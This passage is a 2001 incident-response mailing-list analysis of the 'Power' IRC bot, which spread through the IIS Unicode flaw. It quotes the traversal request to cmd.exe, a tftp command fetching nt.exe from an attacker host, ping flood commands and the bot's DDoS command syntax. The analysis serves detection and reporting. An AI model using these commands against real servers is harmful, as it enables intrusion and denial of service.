---------- Forwarded message ---------- Date: Wed, 8 Aug 2001 12:41:55 -0700 (PDT) Subject: "Power" bot (was Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool) From: Dave Dittrich <dittrichat_private> To: Ryan Russell <ryanat_private> Cc: Eyes to the Skies. <sgtphou@fire-eyes.yi.org>, "intrusionsat_private" <intrusionsat_private>, "INCIDENTSat_private" <INCIDENTSat_private> > On Tue, 7 Aug 2001, Eyes to the Skies. wrote: > > > This looks like an attempt to use a CodeRed II infected system to > > perform a denial of service attack. I don't think I need to stress the > > severity of this. > > > > ==> /var/log/apache/access_log <== > > [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted > > target ip]+"-n"+7000+"-w"+0" 404 - > > Nothing to do with code red, or it would be root.exe, or > /c/winnt/system32/cmd.exe. I believe Ryan is correct that this is not CodeRed (or CodeRed II, or Son-of-teenage-mutant-ninja-Red...) Rather, it looks to me like this is the "Power" bot (CERT Advisory 2001-20 called it a worm, though I don't believe it shows worm properties, when actually it just combines distributed DoS, scanning, and port redirection in a single tool that uses IRC for it control channel.) The CERT Advisory from July 20 can be found at: http://www.cert.org/advisories/CA-2001-20.html Below is an edited version of an analysis of "Power" bot. Best (although hasty) efforts were made to sanitize it. Reports of UDP "probes" from suspected CodeRed infected machines may also be Power, but mis-categorized due to insufficient data. Compare running processes and files on the system with information in this report. If you see evidence of this on your systems or networks, report this to CERT and NIPC. (Please note differences in MD5 hashes of files when reporting to help CERT/NIPC/whoever track variants and/or confirm what is actually on the system. Seems like there are four of five different malware programs floating around Windows NT/2000/IIS systems, and more confusion than necessary about what is what. Details *do* matter.) ------------------------------------------------------------------------ [Note that output of the "ngrep" program is showing "2001/06/XX" instead of "2001/07/XX", e.g.: T 2001/06/03 18:07:28.124220 10.1.0.10:6667 -> 192.168.9.171:2334 [AP] :XXXX!~XXXXat_private PRIVMSG #XXXX :PASS: Password accepted; you are now registered with this service.. This may be a bug. No time has been spent trying to fix it, but conversion of time stamps shown by "tcpdump" shows the log files have the correct times.] Executive summary ----------------- The following is a report of distributed scanning, distributed denial of service (DDoS), and distributed IRC port redirection, surrounding a custom script add on to the mirc32.exe client for Windows. This activity is associated with Windows 2000 and Windows NT systems, and is currently relying on the Unicode vulnerability in Microsoft's IIS server on these platforms. Over 40 systems at one site were affected, and several were used concurrently for denial of service attacks and distributed scanning from July 2 through July 9. This site has received over 100 reports during this period. The distributed scanning is known to have attempted the IIS/Unicode exploit on excess of 300,000 systems, and netted close to 10,000 vulnerable systems between July 6 and July 8, 2001. The attackers are actively using this network for IRC "war" activity. At this time, there is no known motive for more widespread attacks, but the intruders are actively upgrading the software package in an attempt to automate the addition of compromised hosts to the DDoS network, which would result in a fully integrated scan/exploit/attack network. (Limits in the ability to use IRC as a means of command and control may limit the potential size of this network, but even with the hosts they now control they are causing a significant amount of network disruption and hundreds of abuse reports to those sites whose systems are being used for scanning.) Time line and details -------------------- On July 1, 2001, XXXX reported detection of an attempted probe of his web server: -------------------------------------------------------------------------- [07/01/2001 00:04:43.602 GMT-0700] Connection: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (XX.XX.XXX.XXX) on port 80 (tcp). [07/01/2001 00:04:43.922 GMT-0700] GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir -------------------------------------------------------------------------- This shows an attempted exploit of the Windows IIS Unicode vulnerability, most recently made famous on May 8, 2001, in CERT Advisory 2001-11 as a feature of the Linux sadmind-IIS worm: http://www.cert.org/advisories/CA-2001-11.html At 15:05 on July 3, XXXXXX noticed abnormally high traffic rates on the XXXXXXXXXXX/24 subnet: Shortly after this, XXXXX analyzed the router's flow cache and noted the following flows to/from the host XXXXXXXXXXXX (protocol 1 is ICMP): SrcIPaddress DstIPaddress Pr SrcP DstP Pkts B/Pk 209.212.108.28 XXXXXXXXXXXX 01 0000 0000 5496 1500 209.212.108.28 XXXXXXXXXXXX 01 0000 0800 561 1500 200.214.117.61 XXXXXXXXXXXX 01 0000 0800 66 1500 XXXXXXXXXXXX 209.212.108.28 01 0000 0B01 33 56 XXXXXXXXXXXX 200.214.117.61 01 0000 0B01 2 56 XXXXXXXXXXXX 130.161.218.234 01 0000 0000 7245 1475 130.161.218.234 XXXXXXXXXXXX 01 0000 0000 39K1475 530.4 130.161.218.234 XXXXXXXXXXXX 01 0000 0800 893 1500 196.12.33.105 XXXXXXXXXXXX 01 0000 0000 30K1498 1323.3 XXXX noted that, as XXXXXX had observed, the attack appeared to have stopped. XXXXX initiated network traffic monitoring to/from this system and noted the following (output of "ngrep" program shown here): -------------------------------------------------------------------------- T 10.1.0.10:6667 -> XXXXXXXXXXXX:4321 [AP] :blyeuhisdalg!~yxccqtdbciwyat_private JOIN :#XXXX..:tsorbmpybher!~ voqteovzeijy@XXXXXXXXXXXXX JOIN :#XXXX..:ifwufklkxvrn!~tyyaxtpiybwh@XX XXXXXXXXXXX JOIN :#XXXX..:xcvzlgiwcyqw!~yjcefcwnoler@XXXXXXXXXXXX JOIN :#XXXX..:cehhaftlgppn!~skfutrulflcp@XXXXXXXXXXXXX JOIN :#XXXX..:stfet nzamgbm!~accjbzpgfcww@XXXXXXXXXXXX JOIN :#XXXX..:gwypgjbdbely!~actybok ttocq@XXXXXXXXXXXX JOIN :#XXXX..:zijlrondxqhb!~eoeelcwewsbs@XXXXXXXXXX XXX JOIN :#XXXX..:dyyyrpyannjh!~foyazmdppwyx@XXXXXXXXXXXXX JOIN :#XXXX ..:wmvcxcwsgypu!~fhkgogxuwcwa@XXXXXXXXXXXXXX JOIN :#XXXX..:rewgeayxjyv e!~wmqrpzihhrpp@XXXXXXXXXXXXXX JOIN :#XXXX..:kfukbsyoxacl!~qkpttdwhhba d@XXXXXXXXXXXXX JOIN :#XXXX..:jgmkjdbvlrpy!~sprbfnzguzwc@XXXXXXXXXXXXX JOIN :#XXXX..:swbbqdjyviql!~imufldgcgcbt@XXXXXXXXXXXX JOIN :#XXXX.. -------------------------------------------------------------------------- He followed this IRC traffic to other hosts and observed the following: -------------------------------------------------------------------------- T 2001/06/03 18:07:28.124220 10.1.0.10:6667 -> XXXXXXXXXXXXX:2334 [AP] :XXXX!~XXXX@XXXXXXXXXXXX PRIVMSG #XXXX :PASS: Password accepted; you are now registered with this service.. T 2001/06/03 18:07:28.625205 10.1.0.10:6667 -> XXXXXXXXXXXXX:2334 [AP] :XXXX!~XXXX@XXXXXXXXXXXX PRIVMSG #XXXX :BNC.START: BNC started o n port 111 [ /server XX.XXX.XXX.XX 111 ].. -------------------------------------------------------------------------- Based on investigation, XXXXX was able to identify 9 hosts that were likely compromised. XXXXX had observed IRC traffic associated with these hosts. XXXXX reported that the only IRC nick observed using XXXXXXXXXXXXXXXX systems that isn't a random string of characters is "XXXXXXXXXXXXX", and it looks like she and her bots hang out in the channel #XXXXX: -------------------------------------------------------------------------- T 10.0.0.1:6667 -> XXXXXXXXXXXX:4315 [AP] :XXXXXXXXXXX!~XXXXXXat_private PRIVMSG #XXXXX :!rbots join #XXXX.. -------------------------------------------------------------------------- (enter all of his bots into #XXXX) XXXXX observed the nick "XXXXXX" immediately grant operator privileges to all of the bots, so it is assumed this is either also a bot, or he/she is probably involved as well. XXXXX made an nmap scan of the above listed suspect systems. Common to many was a profile like the following, which shows Windows 2000 as the operating system, and at least two unusual listening ports: -------------------------------------------------------------------------- Starting nmap V. 2.53 by fyodorat_private ( www.insecure.org/nmap/) Interesting ports on XXXXXXXXXXXX (192.168.1.225): (The 65522 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 23/tcp open telnet 25/tcp open smtp 80/tcp open http 100/tcp open newacct 135/tcp open loc-srv 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open listen 1026/tcp open nterm 4836/tcp open unknown 12624/tcp open unknown TCP Sequence Prediction: Class=random positive increments Difficulty=17052 (Worthy challenge) Remote operating system guess: Windows 2000 RC1 through final release -------------------------------------------------------------------------- A connection to the 12624/tcp port elicits a "Password:" prompt. (A capture of all network to/from several hosts was initiated on July 3.) On July 3, notice was sent to all the registered subnet contacts for the known hosts, noting the suspected intrusions and the known ports 100/tcp and 12624/tcp. One administrator who received this message reported that he had analyzed his system (a Win2k/IIS test system) using Foundstone's "fport" program, found on this page: http://www.foundstone.com/rdlabs/tools.php?category=Forensic It showed the following: -------------------------------------------------------------------------- FPort v1.33 - TCP/IP Process to Port Mapper Copyright 2000 by Foundstone, Inc. http://www.foundstone.com Pid Process Port Proto Path 884 inetinfo -> 21 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 884 inetinfo -> 25 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 884 inetinfo -> 80 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 1400 winnt -> 100 TCP C:\winnt.exe 444 svchost -> 135 TCP C:\WINNT\system32\svchost.exe 884 inetinfo -> 443 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 8 System -> 445 TCP 736 MSTask -> 1044 TCP C:\WINNT\system32\MSTask.exe 884 inetinfo -> 1052 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 660 sqlservr -> 1056 TCP C:\MSSQL7\binn\sqlservr.exe 8 System -> 1067 TCP 660 sqlservr -> 1433 TCP C:\MSSQL7\binn\sqlservr.exe 1400 winnt -> 2350 TCP C:\winnt.exe 1400 winnt -> 2351 TCP C:\winnt.exe 1400 winnt -> 2352 TCP C:\winnt.exe 1400 winnt -> 2353 TCP C:\winnt.exe [hundreds of lines removed . . .] 1400 winnt -> 2646 TCP C:\winnt.exe 1400 winnt -> 2647 TCP C:\winnt.exe 1400 winnt -> 2648 TCP C:\winnt.exe 772 termsrv -> 3389 TCP C:\WINNT\System32\termsrv.exe 884 inetinfo -> 4700 TCP C:\WINNT\System32\inetsrv\inetinfo.exe 1152 nt -> 4836 TCP c:\inetpub\scripts\nt.exe 1152 nt -> 12624 TCP c:\inetpub\scripts\nt.exe 444 svchost -> 135 UDP C:\WINNT\system32\svchost.exe 8 System -> 445 UDP 260 lsass -> 1027 UDP C:\WINNT\system32\lsass.exe 220 winlogon -> 1046 UDP \??\C:\WINNT\system32\winlogon.exe 248 services -> 1051 UDP C:\WINNT\system32\services.exe 884 inetinfo -> 1064 UDP C:\WINNT\System32\inetsrv\inetinfo.exe 564 llssrv -> 1087 UDP C:\WINNT\System32\llssrv.exe 464 spoolsv -> 1217 UDP C:\WINNT\system32\spoolsv.exe 884 inetinfo -> 3456 UDP C:\WINNT\System32\inetsrv\inetinfo.exe 1152 nt -> 12623 UDP c:\inetpub\scripts\nt.exe -------------------------------------------------------------------------- Listening on 100/tcp and 12624/tcp is the same program, "c:\inetpub\scripts\nt.exe". (It is unclear what the 300 ports listed for "C:\winnt.exe" are all about.) On July 5, XXXX notes more IRC traffic that has been logged, showing the network for bots being used to initiate DDoS attacks: -------------------------------------------------------------------------- T 2001/06/05 09:46:03.354884 10.0.0.1:6667 -> 192.168.1.153:1423 [AP] :XXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!udp 209.253.49.243 99999999.. T 2001/06/05 09:56:40.777333 10.0.0.1:6667 -> 192.168.1.143:4513 [AP] :XXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!hudp.. T 2001/06/05 10:26:32.567410 10.0.0.1:6667 -> 192.168.1.102:2827 [AP] :XXXX!~XXXXXXat_private QUIT :upset/depressed/pissed off/hu rt.. T 2001/06/05 10:26:32.561551 10.0.0.1:6667 -> 192.168.1.180:2380 [AP] :XXXX!~XXXXXXat_private QUIT :upset/depressed/pissed off/hu rt.. T 2001/06/05 10:40:45.555193 10.0.0.1:6667 -> 192.168.1.164:2567 [AP] :XXXXX!~XXXXXXat_private JOIN :#XXXX.. T 2001/06/05 09:19:36.061139 10.0.0.1:6667 -> 192.168.14.46:4447 [AP] :XXXX!~XXXXXXat_private PRIVMSG #XXXX :!udp 24.76.35.83 10 000.. T 2001/06/05 09:29:30.138876 10.0.0.1:6667 -> 192.168.16.108:3645 [AP] :XXXXX!~XXXXXat_private JOIN :#XXXX.. -------------------------------------------------------------------------- The victim of this attack is: A030-0751.HSTN.splitrock.net: Internet address = 209.253.49.243 [whois.arin.net] SplitRock Services, Inc (NETBLK-SPLITROCK98) 8665 New Trails Drive The Woodlands, TX 77381 US Netname: SPLITROCK98 Netblock: 209.252.0.0 - 209.255.255.255 Maintainer: SPLT Coordinator: Splitrock Services, Inc (IS1-ARIN) netadminat_private 281.465.1200 (See also files "remote.ini" and "mirc.ini") On July 6, two incident handlers examined a suspect Windows 2000 system. Using Foundstone's "afind" and "fport" forensic tools for Windows it was confirmed that "nt.exe" was installed on this system July 1 19:39 PDT. (It was found that C:\winnt.exe could not be zipped directly, but could be copied to D:\ where it was then possible to zip it into an archive.) The following files were found and retrieved for analysis and reverse engineering (MD5 hashes shown for comparison): 00b41a87e536de8908af134692ceadf6 hexplore.exe 00f8ba83759e9257603d4203b0561715 mirc.ini 87f4355b0a59a7e87250ff4925dc75b8 nt.exe 6d3ee930a216483ea2dd5860ea7d44f0 nt.INI 748cbd596f1956858f27f88731000644 remote.ini 7644ae3bcadae89e7160e3aff2e7d2bc root.exe 5cbbd44be7359be787765abf7c90644b winnt.exe 0a1295be3a0fb615e7dfb88b9a3abb20 win98.ava dc5a3f43491d8309f1742acec7668698 wins.ava These files were located in the C:\Inetpub\scripts, C:\, and C:\i386 directories. (The same system showed an earlier exploitation by the sadmind-IIS worm, which left the files default.asp, default.htm, index.asp, and index.htm. Also found was root.exe, which may have been from yet another prior compromise.) Volume in drive C has no label. Volume Serial Number is 401B-321D Directory of c:\Inetpub\scripts 07/01/01 19:31 <DIR> . 07/01/01 19:31 <DIR> .. 06/13/01 09:19 289 default.asp 06/13/01 09:19 289 default.htm 06/13/01 09:19 289 index.asp 06/13/01 09:19 289 index.htm 07/01/01 19:30 161,280 nt.exe 07/01/01 19:31 23 nt.INI 11/18/99 12:04 208,144 root.exe 9 File(s) 370,603 bytes 37,631,488 bytes free It is not clear what role the nt.INI file plays, but the contents are shown here (two versions from two different sources are shown): % xxd nt.INI 0000000: bdb0 a8b3 baad 0d0a cfdc c0d2 decb cb0d ................ 0000010: 0a0d 0a0d 0a0d 0a ....... % xxd ../nt.INI 0000000: bdb0 a8b3 baad 0d0a dad1 cbd6 decb 0d0a ................ 0000010: 0d0a 0d0a 0d0a ...... The program appears to work in this way: 1). The attacker exploits the Unicode vulnerability in Microsoft IIS to run a command. This command uses the trivial file transfer protocol to upload a file from the attacking host: -------------------------------------------------------------------------- 2001-07-02 21:39:14 10.1.1.1 - 192.168.14.197 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp.exe+"-i"+10.1.1.1+GET+nt.exe 502 - -------------------------------------------------------------------------- (It is assumed the same method is used to then run the program, although this has not been confirmed from system logs. The above is all that was provided.) 2). The "nt.exe" program appears to be compressed. When run, it is assumed it uncompresses itself, creates(?) a file nt.INI (role not determined yet) and configures the system to restart itself at each reboot. It listens on port 12624 for commands to upload files. (It is not yet clear precisely how this upload protocol works, but it has been observed to upload files on port 4836/tcp as shown below.) 3). After nt.exe is set up, a series of programs are loaded, including: winnt.exe Renamed(?) mirc32.exe binary mirc.ini mirc32 config file hexplore.exe Rootkit style process hider? remote.ini Configuration file for bot wins.ava Code for BNC/Scan/DDoS program win98.ava Code for BNC/Scan/DDoS program These files have been found in C:\Inetpub\scripts, C:\, and/or C:\i386. 4). Periodically, new updates of the program are uploaded from other sites. (This program appears to be in active development by XXXXX and XXXXXXX.) The following is the (edited) contents of "remote.ini", a list of variables for the bot, which shows these nicks and other specifics of the bot: -------------------------------------------------------------------------- [variables] n0=%access XXXXX XXXXX XXXXXXX XXXX n1=%scan.ip 24.189.31.* n2=%scan.port 27374 n3=%scan.inc 191 n4=%r 858921703669 n5=%scan.range 24.189.31.190 n6=%auto #XXXX n7=%masterpass 12345 n8=%key password n9=%pass power n10=%mass.server dysfunction-1.mine.nu n11=%mass.port 6667 n12=%mass.bots 5 n13=%mass.inc 5 n14=%user qmlhzqztcjqh n15=%split.server 192.168.10.10 n16=%split.port 6667 n17=%split.chans #XXXX,#XXXXXX,#XXXX n18=%bnc power n19=%udp.times 99999 n20=%udp.chan #XXXX n21=%dos.ip 209.245.102.72 n22=%dos.times 50 n23=%bup 15 n24=%bnc.port 100 n25=%bnc.status On n26=%scan.p 27374 n27=%sscan On n28=%scan.info SubSeven Protection: http://come.to/sub7-protection/ n29=%found.upload server removed. closing... n30=%progress 8 n31=%uploading found n32=%localfile c:\windows\winserver.exe n33=%remotefile c:\windows\winserver.exe n34=%upload.tot 382371 n35=%channel #XXXX n36=%prefix 24 -------------------------------------------------------------------------- Commands supported by the server version analyzed on July 7, 2001. Command options are shown in lower case, with user specific variable arguments shown in ALL CAPS (see "wins.ava" for source to these commands): -------------------------------------------------------------------------- !info Show info about system running bot, for example: :XXXXX!~XXXXXXat_private PRIVMSG #XXXX :!info PRIVMSG #XXXX :[Windows 2000][1wk 3days 6hrs 25mins 12secs][192.168.1.153][Powe r1.0] :Power[9738712607]!~Powerat_private PRIVMSG #XXXX :[Windows NT][2wks 6days 22hrs 6mins 3secs][217.34.102.68][Power1.0] :Power[2558484581]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][2wks 1day 15hrs 52mins 4secs][217.34.44.16][Power1.0] :Power[6813557052]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][1wk 2days 8hrs 44mins 53secs][192.168.1.213][Power1.0] :Power[2916020276]!~Powerat_private PRIVMSG #XXXX :[Windows NT][1wk 6days 1 5hrs 27mins 33secs][192.168.13.60][Power1.0] :Power[4053275324]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][1wk 2days 8hrs 44mins 1sec][192.168.1.171][Power1.0] :Power[4205594385]!~Powerat_private PRIVMSG #XXXX :[Windows 2000][2wks 6day s 2hrs 15mins 51secs][192.168.1.180][Power1.0] . . . !add NICK Allows access to specified nick !remove NICK Removes access to specified nick !access ??? !pass PASSWORD Sets new password !login PASSWORD Logs user in, if the password is correct (this password is in clear text.) !massbots SERVER PORT BOTS (Not sure how this works, but probably tells bots which IRC server to use; not sure what the # at end is for yet.) !rbots #CHAN Register(?) bots in channel "#CHAN". !cbots Closes socket for "*Power*" (kills bots?) !udp IP TIMES Floods victim ip address "IP" with large UDP packets !hudp IP !hudp all Halt UDP flood on specific IP, or all hosts being flooded !udplist Prints list of ips being flooded. !dos IP TIMES This command exploits a feature of Microsoft Windows 2000 ping.exe, which allows one to set the protocol type to IGMP or IGRP for packets sent, using the following flags: ping -v igrp -t -l 5000 %dos.ip -n %dos.times -w 0 ping -v igmp -t -l 5000 %dos.ip -n %dos.times -w 0 !bnc on Enable BNC port redirection on preset port (100 is being used currently on those bots observed.) !bnc off Disable BNC port redirection. !bnc port PORT Set port for BNC to listen on to "PORT". !bnc pass BNC ??? !bnc reset Closes and reopens socket. !bnc status Report status of BNC and explain how to connect to it. !scan status Report status of scanning (IP and port.) !scan off Stop scanning. !scan prefix PREFIX Start scanning IP netblock with prefix PREFIX on predefined port. !scan on Start scanning on IP netblock defined by the first octet the predefined prefix, the second octet randomized from 0..220, the third octet randomized from 0..255, and the forth octet being anything. The port to be scanned is assumed to have been set earlier. Lastly, it reports scanning status. !scan port PORT Sets the port to be scanned and reports status. !raw command [args...] (Not quite sure how this works.) !/clear (Unknown how this works) !host list If user's nick is in a special access list, list the number of lines in the file "webservers.txt" (must be a list of bots). !host send Sends a copy of "webservers.txt" via DCC. !packet IP PACKETS Flood address IP with PACKETS packets from each of a set of web servers listed in a file "webservers.txt". These are Windows IIS servers with the Unicode vulnerability. It sends each one a web request: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c ping.exe -v igmp -t -l 30000 IP -n PACKETS -w 10 Reports "Packeting IP with # Packets and N hosts" (where "N" is the number of lines in "webservers.txt") !socks Reports "Sockets Opened During Last Packet: N" where N is a variable %sockets. !rbots COMMAND Not sure what this is, but here it is in use: T 2001/06/06 02:37:25.209849 10.0.0.1:6667 -> 192.168.1.153:3145 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!rbots privmsg dos[12] :this annoying!.. . . . T 2001/06/06 02:38:02.828723 10.0.0.1:6667 -> 192.168.1.153:3145 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!rbots notice dos[12] :this annoying!.. -------------------------------------------------------------------------- Examples of commands: -------------------------------------------------------------------------- T 2001/06/06 00:38:22.697747 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!udp 216.198.75.194 99999.. T 2001/06/06 00:38:23.106934 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[2558484581]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.1 98.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[973871260 7]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Time s: 99999][Halt: !hudp 216.198.75.194]..:Power[8935450546]!~Powerat_private 4.104.98 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[9201287277]!~Powerat_private PRIVMS G #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198. 75.194]..:Power[8536771384]!~Powerat_private PRIVMSG #XXXX :[UDP] [IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power [6035234664]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75 .194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[2916020276]!~P owerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99 999][Halt: !hudp 216.198.75.194]..:Power[2905936848]!~Powerat_private .12 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hud 999][Halt: !hudp 216.198.75.194]..:Power[2905936848]!~Powerat_private .12 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hud p 216.198.75.194]..:Power[5499856258]!~Powerat_private PRIVMSG #po wer :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.19 4]..:Power[4053275324]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[6731 664986]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194] [Times: 99999][Halt: !hudp 216.198.75.194]..:Power[3834129955]!~Power@ 217.34.95.185 PRIVMSG #XXXX :[UDP][IP: 216.19.............. T 2001/06/06 00:38:23.106934 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] s: 99999][Halt: !hudp 216.198.75.194].. T 2001/06/06 00:38:23.490730 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[2236262189]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216. 198.75.194][Times: 99999][Halt: !hudp 216.198.75.194]..:Power[87055102 95]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Tim es: 99999][Halt: !hudp 216.198.75.194]..:Power[6941998911]!~Power@217. 34.194.193 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Hal es: 99999][Halt: !hudp 216.198.75.194]..:Power[6941998911]!~Power@217. 34.194.193 PRIVMSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Hal t: !hudp 216.198.75.194]..:Power[9080084936]!~Powerat_private PRIV MSG #XXXX :[UDP][IP: 216.198.75.194][Times: 99999][Halt: !hudp 216.19 8.75.194].. T 2001/06/06 00:38:29.706665 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[3408730344]!~Powerat_private PRIVMSG #XXXX :All UDP Halted. . T 2001/06/06 00:38:30.278941 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[3408730344]!~Powerat_private PRIVMSG #XXXX :[UDP][IP: 216.1 98.75.194][Times: 99999][Halt: !hudp 216.198.75.194].. T 2001/06/06 00:38:19.943790 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG #XXXX :!hudp all.. T 2001/06/06 00:38:20.328563 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[9738712607]!~Powerat_private PRIVMSG #XXXX :All UDP Halted ..:Power[2558484581]!~Powerat_private PRIVMSG #XXXX :All UDP Halte d..:Power[8935450546]!~Powerat_private PRIVMSG #XXXX :All UDP Hal ted..:Power[2916020276]!~Powerat_private PRIVMSG #XXXX :All UDP H alted.. T 2001/06/06 00:38:20.869588 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[3834129955]!~Powerat_private PRIVMSG #XXXX :All UDP Halted ..:Power[6035234664]!~Powerat_private PRIVMSG #XXXX :All UDP Halt ed..:Power[2905936848]!~Powerat_private PRIVMSG #XXXX :All UDP Ha lted..:Power[5499856258]!~Powerat_private PRIVMSG #XXXX :All UDP Halted..:Power[6731664986]!~Powerat_private PRIVMSG #XXXX :All UD P Halted..:Power[4053275324]!~Powerat_private PRIVMSG #XXXX :All UDP Halted..:Power[9201287277]!~Powerat_private PRIVMSG #XXXX :Al l UDP Halted..:Power[8536771384]!~Powerat_private PRIVMSG #XXXX : UDP Halted..:Power[9201287277]!~Powerat_private PRIVMSG #XXXX :Al l UDP Halted..:Power[8536771384]!~Powerat_private PRIVMSG #XXXX : All UDP Halted..:Power[8705510295]!~Powerat_private PRIVMSG #XXXX :All UDP Halted..:Power[9080084936]!~Powerat_private PRIVMSG #pow er :All UDP Halted..:Power[6941998911]!~Powerat_private PRIVMSG # power :All UDP Halted.. T 2001/06/06 00:38:21.840309 10.0.0.1:6667 -> 192.168.1.213:3891 [AP] :Power[2236262189]!~Powerat_private PRIVMSG #XXXX :All UDP Halted .. T 2001/06/06 00:58:49.455709 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXX!~XXXXXXat_private PRIVMSG #XXXXXX :!info.. T 2001/06/06 00:58:49.660791 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[208]!~Powerat_private PRIVMSG #XXXXXX :[Windows 2000][1wk 3d ays 7hrs 7mins 12secs][192.168.1.153][Power1.0].. T 2001/06/06 00:58:49.944976 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :Scanner[24]!~Powerat_private PRIVMSG #XXXXXX :[Windows 2000][2wks 6d ays 2hrs 57mins 52secs][192.168.1.180][Power1.0].. Request for webservers.txt (list of vulnerable IIS servers) T 2001/06/06 05:09:13.401016 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[65] :!raw dcc s end XXXXXXX webservers.txt.. T 2001/06/06 05:09:13.533831 192.168.1.153:2818 -> 10.0.0.1:6667 [AP] NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.153). T 2001/06/06 05:09:14.051419 192.168.1.213:4039 -> 10.0.0.1:6667 [AP] NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.213). T 2001/06/06 05:09:14.141264 192.168.1.153:2818 -> 10.0.0.1:6667 [AP] PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 4989 28971.. T 2001/06/06 05:09:14.562170 192.168.1.213:4039 -> 10.0.0.1:6667 [AP] PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 3843 32793.. T 2001/06/06 05:09:18.843498 10.0.0.1:6667 -> 192.168.1.153:2818 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[208] :.DCC RESU ME file.ext 4989 2130... T 2001/06/06 05:09:18.844475 192.168.1.153:2818 -> 10.0.0.1:6667 [AP] PRIVMSG XXXXXXX :.DCC ACCEPT file.ext 4989 2130.. T 2001/06/06 05:09:24.155118 10.0.0.1:6667 -> 192.168.1.213:4039 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[65] :!raw dcc s end XXXXXXX webservers.txt.. T 2001/06/06 05:09:24.155118 10.0.0.1:6667 -> 192.168.1.153:2818 [AP] :XXXXXXX!~XXXXXXat_private PRIVMSG Scanner[208] :!raw dcc send XXXXXXX webservers.txt.. T 2001/06/06 05:09:24.170743 192.168.1.153:2818 -> 10.0.0.1:6667 [AP] NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.153). T 2001/06/06 05:09:24.251799 192.168.1.213:4039 -> 10.0.0.1:6667 [AP] NOTICE XXXXXXX :DCC Send webservers.txt (192.168.1.213). T 2001/06/06 05:09:24.730324 192.168.1.153:2818 -> 10.0.0.1:6667 [AP] PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728921 3407 29000.. T 2001/06/06 05:09:24.839701 192.168.1.213:4039 -> 10.0.0.1:6667 [AP] PRIVMSG XXXXXXX :.DCC SEND webservers.txt 2153728981 2523 32793.. -------------------------------------------------------------------------- -------------------------------------------------------------------------- > 192.168.1.153 - - [06/Jul/2001:06:44:08 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" > > Jul-06 05:30:26 192.168.1.213 > > GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir [Fri Jul 6 03:08:15 2001] [error] [client 192.168.1.180] File does not exist: /usr/sites/ben/htdocs/default/scripts/..Á^Ü../winnt/system32/cmd.exe 192.168.1.180 - - [06/Jul/2001:03:08:15 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" [Fri Jul 6 03:08:15 2001] [error] [client 